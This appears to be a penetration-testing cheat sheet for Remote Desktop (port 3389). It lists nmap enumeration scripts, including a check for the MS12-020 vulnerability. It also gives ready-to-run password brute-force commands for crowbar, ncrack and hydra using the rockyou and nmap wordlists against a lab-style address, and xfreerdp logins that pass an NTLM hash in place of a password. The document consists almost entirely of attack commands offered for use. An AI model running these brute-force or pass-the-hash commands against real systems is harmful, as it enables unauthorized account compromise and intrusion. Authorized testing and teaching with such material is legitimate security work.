
3389 - Pentesting RDP

nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn <IP>

Brute force - crowbar

crowbar --server 10.11.1.7/32 -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv

crowbar --server 10.11.1.7/32 -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv

Brute force - ncrack

ncrack -vv --user pedro -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.7

ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.7

Brute force - hydra

hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst rdp://10.11.1.7

hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst rdp://10.11.1.7

Connect with known credentials or NTLM hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>

xfreerdp /u:admin /p:123456  /cert:ignore /v:10.11.1.7 /w:2000 /h:900